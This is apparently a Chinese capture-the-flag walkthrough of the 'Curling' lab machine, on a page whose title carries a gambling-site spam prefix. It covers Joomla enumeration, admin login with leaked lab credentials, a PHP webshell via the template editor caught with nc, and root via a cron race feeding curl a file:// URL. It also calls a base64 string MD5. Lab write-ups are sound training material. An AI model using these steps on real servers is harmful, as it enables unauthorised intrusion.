w88优德Curling靶机渗透_偃师民声网

w88优德

1、nmap -v -sC 10.10.10.150
发现存在一个joomscan cms

PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:  |   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA) |   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA) |_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519) 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-title: Home No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

2、尝试使用joomscan扫描,发现版本是3.8.8的
joomscan -u

[+] FireWall Detector  [++] Firewall not detected  [+] Detecting Joomla Version [++] Joomla 3.8.8  [+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable  [+] Checking Directory Listing [++] directory has directory listing :  http://10.10.10.150/administrator/components http://10.10.10.150/administrator/modules http://10.10.10.150/administrator/templates http://10.10.10.150/images/banners   [+] Checking apache info/status files [++] Readable info/status files are not found  [+] admin finder [++] Admin page : http://10.10.10.150/administrator/  [+] Checking robots.txt existing [++] robots.txt is not found  [+] Finding common backup files name  [++] Backup files are not found  [+] Finding common log files name [++] error log is not found  [+] Checking sensitive config.php.x file [++] Readable config files are not found Your Report : reports/10.10.10.150/

查了一下joolma 3.8.8版本并没有什么能够getshell的漏洞

根据提示第一阶段:枚举。检查所有内容(包括页面源)并查找常见的文件扩展名。您登录所需的一切就在您的面前。一旦您登录,您可能需要先研究一下,然后才能弄清楚如何在系统上执行命令,但这非常非常简单。

我们先看标题Cewl ,这个查了一下是一个爬取单词的工具。好像并没发现什么
cewl -d 2 -m 5
这里显示的是部分内容

curling
Curling
Print
Uncategorised
first
Begin
Content
Right
Sidebar
Username
Password
Forgot

我们查看一下源代码body标签下方有个注释文件

<!-- secret.txt -->

访问一下secret.txt得到一串MD5加密字符串

Q3VybGluZzIwMTgh
解密:Curling2018!

我们可以看到页面上有一个Curling2018,下方有个作者Floris。
这里可能存在某种关联,尝试后台登陆

我们访问后台地址
输入用户名/密码
Floris/Curling2018!

寻找上传点,修改joomla的配置文件,后缀名允许上传php,发现还是上传不成功。

去社区看了一下讨论,存在一个RCE。不过这个我没找到。

在网上找到一个Templates 上传shell的方法。
在导航栏找到Extensions->Templates->Templates 打开
然后找到Beez3 Details and Files ,点开链接。点击New File

创建一个php文件

然后输入你要写入的php shell内容。

使用nc接收webshell。
然后打开链接

提示第二阶段(用户):如果文件的前几个字节看起来很熟悉,那是因为它们是。如果他们不是,谷歌他们。无论哪种方式,弄清楚如何将数据转换为其他东西,然后重复。最终你会得到一个明文或其他的明文,你知道如何处理。

我们打开/home/floris 发现user.txt,但是并没有权限查看
根据上面的提示我们查看/home/floris/里面可以查看的文件。
cat password_backup
查看前面的文件头425a68是一个压缩文件头
可以使用Bzip2算法的 压缩文件

把该文件放到kali下使用bzip命令,然后直接打开压缩包有个password.txt文件,有一个账号密码
bzip2 -d password_backup.tar.bz2
ssh账号密码:
flort/5d<wdCbdZu)|hChXll
cat user.txt

尝试看一下进程变化,使用ps命令然后间隔几分钟分别输出a.txt、b.txt。最后使用diff a.txt b.txt比较
ps -ef > a.txt
ps -ef > b.txt
diff a.txt b.txt
这里是比较出来的部分内容,看到cron,是个定时任务的命令
再看看cat /root/default.txt> 最后输出到input

> root      1954  1062  0 07:10 ?        00:00:00 /usr/sbin/CRON -f > root      1957  1954  0 07:10 ?        00:00:00 /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input > root      1959  1957  0 07:10 ?        00:00:00 sleep 1

我们可以cat /home/floris/admin-area/input 。发现没啥信息。那应该就是修改cron里面的任务计划,去cat /root/root.txt。然后再查看admin-area/input文件了
但是发现这里并不是这样去完成的,我们换个思路,监听新进程,然后看cron执行了什么操作,然后再分析一波。

通过不断的去查看新的进程,输出出来,就能找到定时任务执行的命令了。
while true; do ps -ef | grep sh | grep -v sshd |grep root;done;

分析了一下定时任务通过curl -K 读取文件,把获取到的内容写入report
我们在1.txt写入内容

url = "file:///root/root.txt"

然后通过cp不断的去竞争input,写入file:///root/root.txt。
然后curl 就会读取到root.txt写入report了
while true; do cp -p /tmp/1.txt /home/floris/admin-area/input;done;

最后cat写入的文件就拿到flag啦
cat report

最后致谢一下金师傅给的提示!
参考